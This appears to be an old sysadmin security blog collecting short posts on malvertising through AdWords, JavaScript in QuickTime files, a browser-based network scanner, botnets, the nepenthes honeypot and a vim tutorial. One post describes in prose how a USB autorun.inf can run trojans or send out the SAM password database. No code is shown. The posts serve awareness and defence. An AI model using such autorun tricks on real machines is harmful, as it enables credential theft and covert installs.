average admins

Personally, I have an AdBlock entry that blocks Google AdWords and a lot of other advertising sites. I know that by displaying ads, you’re opening yourself up to HTML, Javascript, and any other nastiness that doesn’t originate from the site you’re trying to visit. I also don’t click on those paid advertising links from a Google search because usually they’re for a commercial product when all I need are simple instructions.

Here are two sites by people that have personally dealt with the maliciousness of Google AdWords.

http://www.dynamoo.com/blog/2007/04/malware-via-adwords.html
http://explabs.blogspot.com/2007/04/google-sponsored-links-not-safe.html

I use this link often when setting up new computers or helping a friend or family member secure theirs. Since I’m always searching for this site, I decided to mirror a copy of it here.

If someone knows of a better suite of tools please let me know.

So how did I get infected in the first place?
http://www.castlecops.com/postlite7736-.html

(more…)

This is from another one of my favorite blogs: Didier Stevens.

I found this entry enjoyable because it’s yet another one of those “Owned by MySpace” posts. It’s also really well written and very easy to follow (even for a newcomer).

Here’s a link to the blog entry:
http://didierstevens.wordpress.com/2007/03/12/p0wned-by-a-qt-movie/

Embedding JavaScript inside a Quicktime movie is nothing new as GNUCitizen discussed back in September but it’s good to actually see that in the wild.

I ran across a few articles yesterday while doing some catching up on old blogs I haven’t read in a while.

Everyone probably knows that if you get a new USB key it comes with a U3 partition. And I’m also sure that everyone knows you can hack that U3 partition to automatically install and run whatever software you want (trojans, spyware, pull the SAM database and email it somewhere, ..etc).

However, did you know you can do the same thing with an old non-U3 USB key? It works roughly the same way. You create an autorun.inf file and stick it in the root of your key. When it is inserted into an XP SP2 machine, it pops up and presents the user with the standard “What do you want to do with this thing” window. The autorun file can be programmed to include a custom action with a custom icon that resides at the top of the pop up window.

(more…)

I just read an article on Richard Bejtlich’s blog about some proof of concept code that SPI Dynamics has released. The application is written in JavaScript and runs in a web browser. The application shows how a JavaScript application can scan network devices and even determine running services on hosts found to be active on the network. This is an extremely cool concept.

I suggest you read the whitepaper and give the proof of concept a try. It is quite impressive. I tried the proof of concept on my home network and was amazed as the web page continued to update displaying live hosts on the network and whether the hosts were running a web server or not. It scanned my HP 2550 Color LaserJet printer and showed the IP to be active and that there was a web server running on it, although it couldn’t identify the server software correctly. It currently will only identify IIS and Apache web servers correctly. There are also a lit of known issues posted on their site.

I can see how this could get ugly real fast. The next web site you entertain could have something similar running behind the scenes and may not be so polite as to update the web page you are viewing with the activities it is performing unbeknownst to you. If this type of scanner were to grow over time, there could be ways to determine vulnerabilities within the services found on the host and then determine ways to exploit them. All of this can happen while you peruse the web behind the comfort and security of your firewall… Interesting!

If you’re a UNIX / Linux guy and use vi or vim on a regular basis, this tutorial is for you. There’s no way for one person to know all, or in my case a quarter, of what vi/vim has to offer. I’m ALWAYS learning new things.

This tutorial will definitely show you things you didn’t know about vim.

The author of this tutorial brings up a good point, why take the time to learn a more efficient way to do the task at hand when doing the research to find a more efficient way would take more time than just doing the task? Because the next time you’re faced with this task, you’ll still be stuck doing it the long way. Besides, how else are you going to learn all the cool features of your favorite text editor?

Also, remember this is an advanced tutorial. As the author states, “In this tutorial I assume the reader to have a basic knowledge of vim. Basic features like editing, movement, searching, replacing, opening, saving etc not covered in this tutorial. I’d recommend going through vimtutor for basic understanding of vim.”

Make sure you read the comments since they also contain good pointers and one guy points us to two more great vim resources:
http://www.rayninfo.co.uk/vimtips.html
http://www.moolenaar.net/habits.html

Now on to the tutorial: http://blog.smr.co.in/cgi-bin/index.cgi/blogs/linux/1143567189.html

This is a great, and long, story about a student at Auburn University who clicked on a link in an email. Of course, clicking on a link in an email isn’t always a bad thing, unless the web server you’re visiting installs maclicious code on your PC!

Even if you’re not interested in botnets or computer security, this is a good read. It’s very informative and offers a glance into the lives of these “bot masters”.

Think you’re safe because your internal network is NAT’d behind a coporate proxy? Think your safe because you’re firewall rules are tight? Think you’re safe because you patch every computer on your network the first Tuesday of every month?

Think again.

http://www.baselinemag.com/article2/0,1540,1946404,00.asp

This is an awesome idea! These guys wrote a program that will monitor your web traffic while you browse sniffing for malware attacks. Once it detects an attack, it will emulate a valid response and log all communications. That’s just cool.

I learned about the tool from Richard Bejtlich’s blog, TaoSecurity. It’s called nepenthes and you can downlaod it from http://nepenthes.mwcollect.org/

One thing I really like about Richard Bejtlich’s blog posts is that he’s very thorough. You can read about his experience installing and using nepenthes at the following URLs:

http://taosecurity.blogspot.com/2006/01/nepenthes-discoveries-earlier-today-i.html
http://taosecurity.blogspot.com/2006/01/nepenthes-installation-ive-been.html

This tool comes prepackaged for all the cool distros: Gentoo, Debian, and FreeBSD, but of course the source is also provided along with instructions with getting it compiled and running in Windows.

You can find the README at http://nepenthes.mwcollect.org/documentation:readme.